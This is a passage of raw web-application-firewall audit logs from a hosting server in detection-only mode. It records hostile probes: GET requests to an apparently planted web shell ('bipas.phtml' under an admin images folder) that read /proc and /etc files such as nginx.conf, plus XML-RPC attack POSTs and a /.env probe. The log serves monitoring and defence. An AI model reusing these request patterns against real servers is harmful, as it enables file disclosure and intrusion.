[tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCxlFCTF37l_jAzt4oXcQAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750118804376507 1037498 (- - -) Stopwatch2: 1750118804376507 1037498; combined=3336, p1=452, p2=2282, p3=156, p4=55, p5=241, sr=122, sw=150, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5501282a-Z-- --6ec3852b-A-- [17/Jun/2025:05:37:04.475497 +0530] aFCxqFJfblPUQiSn5r2WJgAAAAA 98.84.184.80 52420 127.0.0.1 7081 --6ec3852b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/113 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 98.84.184.80 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --6ec3852b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2953 Connection: close Content-Type: text/html; charset=UTF-8 --6ec3852b-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/113"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/113"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCxqFJfblPUQiSn5r2WJgAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750118824470290 5273 (- - -) Stopwatch2: 1750118824470290 5273; combined=2927, p1=453, p2=2327, p3=45, p4=34, p5=68, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6ec3852b-Z-- --57e04e66-A-- [17/Jun/2025:05:37:08.256991 +0530] aFCxrFCTF37l_jAzt4oXfAAAAAU 216.73.216.240 52946 127.0.0.1 7081 --57e04e66-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Fnginx&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Fnginx%2Fnginx.conf.default HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --57e04e66-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3445 Connection: close Content-Type: text/html; charset=UTF-8 --57e04e66-H-- Message: Warning. Matched phrase "etc/nginx/nginx.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/nginx/nginx.conf found within ARGS:viewfile: /proc/thread-self/root/etc/nginx/nginx.conf.default"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/nginx/nginx.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/nginx/nginx.conf found within ARGS:viewfile: /proc/thread-self/root/etc/nginx/nginx.conf.default"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCxrFCTF37l_jAzt4oXfAAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750118828251798 5269 (- - -) Stopwatch2: 1750118828251798 5269; combined=2917, p1=470, p2=2282, p3=43, p4=46, p5=75, sr=117, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --57e04e66-Z-- --6d26966a-A-- [17/Jun/2025:05:37:16.591904 +0530] aFCxtAJ4p5Cdblnjra58mQAAAAI 3.218.103.254 48034 127.0.0.1 7081 --6d26966a-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/134 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.218.103.254 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --6d26966a-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2953 Connection: close Content-Type: text/html; charset=UTF-8 --6d26966a-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/134"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/134"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCxtAJ4p5Cdblnjra58mQAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750118836586984 4971 (- - -) Stopwatch2: 1750118836586984 4971; combined=2413, p1=380, p2=1901, p3=41, p4=37, p5=54, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6d26966a-Z-- --aeb80e62-A-- [17/Jun/2025:05:37:45.674415 +0530] aFCx0H4j6VFpohzeqUMQngAAAAo 146.190.105.35 60996 127.0.0.1 7081 --aeb80e62-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 Cookie: PHPSESSID=5tfch8h4830rhq30hr1h6vcaqn; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_5bbbe861fd9da2a2e79955dc008043%7C%7C1750291664%7C%7C1750288064%7C%7C2c5ed7ccb010c84a8282ad882d4ea785; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=5a6ce67b1f67d0d4794613f0a1c1b034%7C%7C1750291664%7C%7C1750288064%7C%7C710d8b361d10196ec180e6e358310ebe User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --aeb80e62-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=8vrn2nr6t5cman769itr8p1p72; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_8125cecc71d8b75c72500006fe6298%7C%7C1750291665%7C%7C1750288065%7C%7C011ef13365e2d6d4660a10ccde6f65f9; expires=Thu, 19 Jun 2025 00:07:45 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=81e5c949fe2287988018c4d00f37a10b%7C%7C1750291665%7C%7C1750288065%7C%7C90109c6a97bd2d95f4421fbf054226c9; expires=Thu, 19 Jun 2025 00:07:45 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --aeb80e62-E-- --aeb80e62-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCx0H4j6VFpohzeqUMQngAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750118864643645 1030850 (- - -) Stopwatch2: 1750118864643645 1030850; combined=2745, p1=381, p2=1971, p3=103, p4=36, p5=159, sr=90, sw=95, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --aeb80e62-Z-- --75c7f533-A-- [17/Jun/2025:05:38:45.533751 +0530] aFCyDNyZ4SMykfn97vy8UAAAAAs 146.190.105.35 49884 127.0.0.1 7081 --75c7f533-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 Cookie: PHPSESSID=lnmhtui9qbnb5iaaohvoj523s4; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_275a6a3a284f3a7d74b2bcdd5eb4e9%7C%7C1750291723%7C%7C1750288123%7C%7Cdc9af94a1ce115faa7e07ba7a4b94fe5; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=4e5e8760e2c20953faada7a866be7c5a%7C%7C1750291724%7C%7C1750288124%7C%7C52f16970466b0f3411d2d90ad5d212bb User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --75c7f533-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=jd9pkrr4f2a142v30ohp10f2el; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_63286d52efa68b9315e5210b6cf20d%7C%7C1750291725%7C%7C1750288125%7C%7C50675cfaaab729f5151b8678ab91fbc2; expires=Thu, 19 Jun 2025 00:08:45 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=76311cb500af27fcc0c1ff96e0a497ac%7C%7C1750291725%7C%7C1750288125%7C%7C8591ed1024477b467ed9e81f769b06c9; expires=Thu, 19 Jun 2025 00:08:45 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --75c7f533-E-- --75c7f533-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCyDNyZ4SMykfn97vy8UAAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750118924455958 1077875 (- - -) Stopwatch2: 1750118924455958 1077875; combined=3869, p1=531, p2=2939, p3=105, p4=41, p5=160, sr=123, sw=93, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --75c7f533-Z-- --6e8b3059-A-- [17/Jun/2025:05:39:46.294793 +0530] aFCySRXnhE9cEv89BPm6RQAAAAc 146.190.105.35 40110 127.0.0.1 7081 --6e8b3059-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 Cookie: PHPSESSID=sqkoddlnpil1eqn5rlhg1jvrf8; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_d8b96ebca4ac5ead465d9c6dc2c5ac%7C%7C1750291784%7C%7C1750288184%7C%7C18ee5fec4fdc307973cf32b9b66bfbf4; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=5cad622b036e0100bb73cff59fab4595%7C%7C1750291784%7C%7C1750288184%7C%7C62bb48b97a98905699419917e727cdc4 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --6e8b3059-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=0od10michhm1bckblbeess506h; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_2b7416f3dda03ca217963ab67bf91b%7C%7C1750291786%7C%7C1750288186%7C%7C06896692e6ab8d5c2411a3393eac5580; expires=Thu, 19 Jun 2025 00:09:46 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=3aa0bd5004a4d57a88c91cf6bd2f65c9%7C%7C1750291786%7C%7C1750288186%7C%7Cc42592d9b72ea3b416e924e345a59243; expires=Thu, 19 Jun 2025 00:09:46 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --6e8b3059-E-- --6e8b3059-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCySRXnhE9cEv89BPm6RQAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750118985271867 1023012 (- - -) Stopwatch2: 1750118985271867 1023012; combined=3112, p1=433, p2=2279, p3=100, p4=42, p5=162, sr=94, sw=96, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6e8b3059-Z-- --e6967403-A-- [17/Jun/2025:05:40:09.097193 +0530] aFCyX9yZ4SMykfn97vy8kwAAAAs 115.64.196.56 36182 127.0.0.1 7081 --e6967403-B-- POST /?ob=open-bridge/events HTTP/1.0 Host: www.retaxis.com X-Real-IP: 115.64.196.56 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 361 origin: https://www.retaxis.com user-agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2710.1983 Mobile Safari/537.36 accept: */* accept-language: en-US,en;q=0.5 content-type: text/plain;charset=UTF-8 sec-fetch-site: same-origin sec-fetch-mode: cors sec-fetch-dest: empty referer: https://www.retaxis.com/ accept-encoding: gzip, deflate, br cookie: _sfs_id=d80e8399fe7e1a762567257fc78228931750119000; _ga_PETSZCXF5J=GS2.1.s1750119005$o1$g0$t1750119005$j60$l0$h0; _ga=GA1.1.47900032.1750119005; _fbp=fb.1.1750119007733.91044571453198563 --e6967403-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.2.28 Vary: Origin,Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: https://www.retaxis.com Access-Control-Allow-Credentials: true Access-Control-Max-Age: 86400 Set-Cookie: PHPSESSID=boan01s24rquf1sloqhiivp8rt; expires=Mon, 15 Sep 2025 00:10:08 GMT; Max-Age=7776000; path=/; domain=www.retaxis.com; HttpOnly; SameSite=lax Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --e6967403-E-- --e6967403-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.retaxis.com"] [uri "/"] [unique_id "aFCyX9yZ4SMykfn97vy8kwAAAAs"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "www.retaxis.com"] [uri "/index.php"] [unique_id "aFCyX9yZ4SMykfn97vy8kwAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750119007996248 1101043 (- - -) Stopwatch2: 1750119007996248 1101043; combined=4256, p1=481, p2=3502, p3=112, p4=37, p5=123, sr=157, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache WebApp-Info: "default" "1750119005" "-" Engine-Mode: "DETECTION_ONLY" --e6967403-Z-- --15682016-A-- [17/Jun/2025:05:40:16.266557 +0530] aFCyZtyZ4SMykfn97vy8nQAAAAs 196.251.69.172 57834 127.0.0.1 7081 --15682016-B-- GET /.env HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 196.251.69.172 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept-Encoding: gzip, deflate Accept: */* --15682016-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 28834 Connection: close Content-Type: text/html; charset=UTF-8 --15682016-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.tandonamit.com"] [uri "/.env"] [unique_id "aFCyZtyZ4SMykfn97vy8nQAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750119014479657 1786970 (- - -) Stopwatch2: 1750119014479657 1786970; combined=1701, p1=372, p2=1247, p3=0, p4=0, p5=82, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --15682016-Z-- --30084e7d-A-- [17/Jun/2025:05:40:26.066766 +0530] aFCycgJ4p5Cdblnjra59MwAAAAI 216.73.216.240 40452 127.0.0.1 7081 --30084e7d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d%2Fpostfix HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --30084e7d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4142 Connection: close Content-Type: text/html; charset=UTF-8 --30084e7d-E-- --30084e7d-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/postfix"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCycgJ4p5Cdblnjra59MwAAAAI"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/postfix"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCycgJ4p5Cdblnjra59MwAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750119026062198 4647 (- - -) Stopwatch2: 1750119026062198 4647; combined=2524, p1=361, p2=1992, p3=44, p4=35, p5=92, sr=92, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --30084e7d-Z-- --e4011e19-A-- [17/Jun/2025:05:40:46.410551 +0530] aFCyhRXnhE9cEv89BPm6hgAAAAc 146.190.105.35 50616 127.0.0.1 7081 --e4011e19-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 Cookie: PHPSESSID=qmj9tv1ke0pq7gj4sm6pjflf41; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_e1f8719fdfec6f77184ce8f01f0e71%7C%7C1750291844%7C%7C1750288244%7C%7Cbd00d0b62f5c4b5f866ad8ed8c4c44cc; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=a99d2b35bdedf22584f0d311ec66966f%7C%7C1750291845%7C%7C1750288245%7C%7Ce2f6d6ace3bc7073e9ad1e4ff35d0a5c User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --e4011e19-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=obcres6rj1vi7gtepd8gn8qcim; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_99d3ef6131d54a6545c76392708fbb%7C%7C1750291846%7C%7C1750288246%7C%7C7c34974ff472d56d49acf2345db4c514; expires=Thu, 19 Jun 2025 00:10:46 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=34de9813cb9ba64fde453ac5e098912f%7C%7C1750291846%7C%7C1750288246%7C%7Cdf597ee2daf75f1ec0f7e8b88dd04463; expires=Thu, 19 Jun 2025 00:10:46 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --e4011e19-E-- --e4011e19-H-- Message: 